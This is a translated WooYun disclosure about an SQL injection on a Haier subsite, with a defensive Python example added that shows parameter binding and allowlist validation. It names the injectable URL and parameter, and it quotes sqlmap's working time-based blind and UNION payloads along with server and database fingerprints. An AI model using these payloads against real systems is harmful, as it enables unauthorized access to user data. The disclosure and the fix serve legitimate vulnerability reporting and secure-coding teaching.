
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0120824

Title: SQL injection on a Haier Group subsite leaks a large amount of data

Vendor: Haier Group (海尔集团)

Author: missy

Submitted: 2015-06-16 16:56

Fixed: 2015-08-03 18:36

Disclosed: 2015-08-03 18:36

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure timeline:

2015-06-16: Details sent to the vendor; awaiting vendor handling
2015-06-19: Vendor confirmed; details disclosed only to the vendor
2015-06-29: Details disclosed to core white-hats and relevant domain experts
2015-07-09: Details disclosed to regular white-hats
2015-07-19: Details disclosed to intern white-hats
2015-08-03: Details disclosed to the public

Brief description:

Details:

Injection point: http://s.haier.com/sr/ajax/getJirSassIcon.jsp?surveyid=


Parameter: surveyid


(Screenshots 1.jpg, 2.jpg, 3.jpg and 4.jpg not reproduced.)


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: surveyid (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: surveyid=' AND (SELECT * FROM (SELECT(SLEEP(5)))VbuY) AND 'KVOw'='KVOw
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: surveyid=' UNION ALL SELECT NULL,CONCAT(0x716b6b6a71,0x664778526542576e6272,0x7178707171),NULL,NULL,NULL,NULL--
---
web server operating system: Windows
web application technology: Apache 2.2.9, JSP
back-end DBMS: MySQL 5.0.12
Database: newsurvey
[243 tables]


Proof of vulnerability:

Fix recommendation:

Filter the parameter input.
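An added example, not code from the report or from Haier's site, that makes the one-word fix concrete for this endpoint: an allowlist check on surveyid followed by a bound parameter, with the assumed concatenating query shown for contrast. The table name jir_saas_icon, its six-column layout and the sample row are constructed; the parameter name and both payloads are taken from the sqlmap output above.

```python
import re
import sqlite3

# Constructed stand-in for the table behind getJirSassIcon.jsp. The real schema
# is unknown; the advisory only shows that the UNION payload needed 6 columns.
SCHEMA = """
CREATE TABLE jir_saas_icon (
    surveyid INTEGER, icon TEXT, title TEXT, url TEXT, sort INTEGER, status INTEGER
);
INSERT INTO jir_saas_icon VALUES (12, 'icon12.png', 'Survey 12', '/s/12', 1, 1);
"""

# The two payloads exactly as sqlmap reported them for the surveyid parameter.
TIME_BASED = "' AND (SELECT * FROM (SELECT(SLEEP(5)))VbuY) AND 'KVOw'='KVOw"
UNION = ("' UNION ALL SELECT NULL,CONCAT(0x716b6b6a71,0x664778526542576e6272,"
         "0x7178707171),NULL,NULL,NULL,NULL--")

def vulnerable_sql(surveyid: str) -> str:
    """Assumed shape of the original concatenating query (the JSP source is not
    public). The leading quote in the payload closes the string literal, so the
    remainder is parsed as SQL instead of being compared as data."""
    return "SELECT * FROM jir_saas_icon WHERE surveyid = '" + surveyid + "'"

def validate_surveyid(raw: str) -> int:
    """Allowlist layer: a survey id is a short decimal integer, nothing else."""
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("surveyid must be a decimal integer")
    return int(raw)

def fetch_icon(conn: sqlite3.Connection, raw: str) -> list:
    """Hardened handler: validate, then bind the value with a placeholder so it
    can never be parsed as SQL even if the allowlist is later loosened."""
    sid = validate_surveyid(raw)
    return conn.execute(
        "SELECT * FROM jir_saas_icon WHERE surveyid = ?", (sid,)).fetchall()

def fetch_icon_bound_only(conn: sqlite3.Connection, raw: str) -> list:
    """Binding without the allowlist: the payload is compared as one literal
    string and matches no row, so no injected SQL ever runs."""
    return conn.execute(
        "SELECT * FROM jir_saas_icon WHERE surveyid = ?", (raw,)).fetchall()

def make_db() -> sqlite3.Connection:
    """In-memory database loaded with the constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn
```

Binding alone already neutralises both payloads; the allowlist additionally rejects them before any query is built, which is the point at which a request log or WAF rule can raise an alert.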

Copyright notice: when reproducing, please credit the source: missy@WooYun


Vulnerability response

Vendor response:

Severity: High

Rank: 16

Confirmed: 2015-06-19 18:34

Vendor reply:

Thanks to the WooYun platform's white-hat for the testing and the reminder; we have assigned staff to handle it.

Latest status:

None yet

